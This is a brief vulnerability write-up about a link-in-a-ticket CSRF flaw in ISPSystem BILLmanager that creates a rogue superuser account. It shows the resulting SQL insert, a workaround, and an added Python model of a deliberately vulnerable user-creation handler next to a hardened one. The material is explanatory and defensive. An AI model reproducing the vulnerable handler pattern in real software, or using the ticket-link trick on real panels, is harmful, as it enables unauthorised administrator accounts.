
Vulnerability in ISPSystem Billmanager

Hello!
The vulnerability combines an API flaw with social engineering.
A client submits a support ticket that contains a link (usually hidden behind a URL shortener). The link points to:


When a support employee who holds superuser rights opens that link while logged in, the panel processes the request in the employee's session and creates the account admin12345 with superuser rights, the equivalent of the following SQL insert:

```sql
insert into user (id,name,account,password,realname,email,lang,superuser,disabled,support,remotesupport,changepasswd,sendsms)
values (23351,'admin12345',1,'$1$FALDvy2D$fqFzhtlSZrq1pDQ3fkrpr/','test test','test@test.test','ru','1','0','0','0','2012-01-29','0');
```


As a temporary workaround, leave superuser rights on one account only and disable them for all other accounts.
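The attack above, as an added example that is not ISPsystem's code and not part of the original post: a deliberately vulnerable user-creation handler that acts on any authenticated request (so a link in a ticket is enough), next to a hardened one that requires a POST, a same-site Origin/Referer and a per-session anti-CSRF token. The endpoint, parameter names, panel origin and shortener address are assumptions; the real BILLmanager request that the link carried is not shown on the page. The `superuser_holders` set models the workaround of keeping superuser rights on a single account: only those accounts can be turned into a confused deputy.

```python
"""Added example (not ISPsystem code, not from the original post): a model of the
link-in-a-ticket attack, with a vulnerable handler beside a hardened one.
Endpoint, parameter names, panel origin and shortener domain are assumptions."""
import hmac
import secrets
from dataclasses import dataclass, field

PANEL_ORIGIN = "https://billing.example.test"  # assumed panel URL


@dataclass
class Panel:
    """In-memory stand-in for the panel's user table and its privileged accounts."""
    users: dict = field(default_factory=dict)
    superuser_holders: set = field(default_factory=set)


@dataclass
class Session:
    """A logged-in employee; the anti-CSRF token is bound to the session, not the URL."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def _insert_user(panel, name, superuser):
    # Mirrors the 'name' and 'superuser' columns of the INSERT in the write-up.
    panel.users[name] = {"name": name, "superuser": "1" if superuser else "0"}


def vulnerable_create_user(panel, session, method, params, headers):
    """Creates the user on any authenticated request, GET included.
    A plain link opened by a logged-in superuser is enough."""
    if session.user not in panel.superuser_holders:
        return 403, "caller is not a superuser"
    _insert_user(panel, params["name"], params.get("superuser") == "1")
    return 200, "created"


def hardened_create_user(panel, session, method, params, headers):
    """Same action, but only on a POST that originates from the panel itself
    and carries the session's anti-CSRF token (the token is the real guard;
    the Origin/Referer check is defence in depth)."""
    if session.user not in panel.superuser_holders:
        return 403, "caller is not a superuser"
    if method != "POST":
        return 405, "state-changing request must be POST"
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if origin != PANEL_ORIGIN and not origin.startswith(PANEL_ORIGIN + "/"):
        return 403, "request did not originate from the panel"
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return 403, "missing or wrong CSRF token"
    _insert_user(panel, params["name"], params.get("superuser") == "1")
    return 200, "created"


def simulate_ticket_link_click(panel, handler, victim_session):
    """The attack: the employee, logged in, opens the link from the ticket.
    The browser sends a GET with the session cookie, no token, and a Referer
    from outside the panel (a constructed shortener address here)."""
    params = {"name": "admin12345", "superuser": "1"}
    headers = {"Referer": "https://short.example.test/x"}  # constructed
    return handler(panel, victim_session, "GET", params, headers)


if __name__ == "__main__":
    weak = Panel(superuser_holders={"support1"})
    victim = Session("support1")
    print("vulnerable:", simulate_ticket_link_click(weak, vulnerable_create_user, victim))
    hard = Panel(superuser_holders={"support1"})
    print("hardened:", simulate_ticket_link_click(hard, hardened_create_user, victim))
```

Running the block shows the vulnerable handler creating admin12345 as a superuser from a bare GET, while the hardened handler rejects the same click; a forged POST from the attacker's page still fails on the origin and token checks, and only the panel's own form, which carries the session token, gets through.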


Source: https://habr.com/ru/post/137419/

